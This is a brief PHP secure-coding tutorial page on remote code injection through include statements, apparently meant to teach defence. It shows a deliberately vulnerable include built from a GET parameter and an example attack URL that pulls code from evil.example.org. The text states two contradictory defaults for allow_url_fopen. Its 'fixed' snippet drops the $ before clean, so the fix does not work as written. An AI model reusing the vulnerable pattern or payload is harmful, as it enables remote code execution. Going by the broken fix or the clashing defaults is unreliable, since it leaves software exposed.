Memory App
Programming
 




Remote Code Injection

Never using tainted data in an include or require allow_url_fopen = 0 (default) A remote code injection attack occurs when an attacker is able to cause your application to execute PHP code of their choosing.

<?php
    ini_set("allow_url_fopen", 1); // default 0
    include "{$_GET['section']}/data.inc.php"; 
    
    // http://example.org/?section=news
        // include "news/data.inc.php";

    // http://example.org/?section=evil.example.org/attack.inc
        // include "http://evil.example.org/attack.inc?data.inc.php";
It is easy to protect against it by filtering all input and never using tainted data in an include or require statement. By default, allow_url_fopen is set to On.

<?php
    $clean = array();
    $sections = array('home', 'news', 'photos', 'blog');
    if (in_array($_GET['section'], $sections)) {
        $clean['section'] = $_GET['section'];
    } else {
        $clean['section'] = 'home';
    }
    include "{clean['section']}/data.inc.php";


Questions



Top Reference > Programming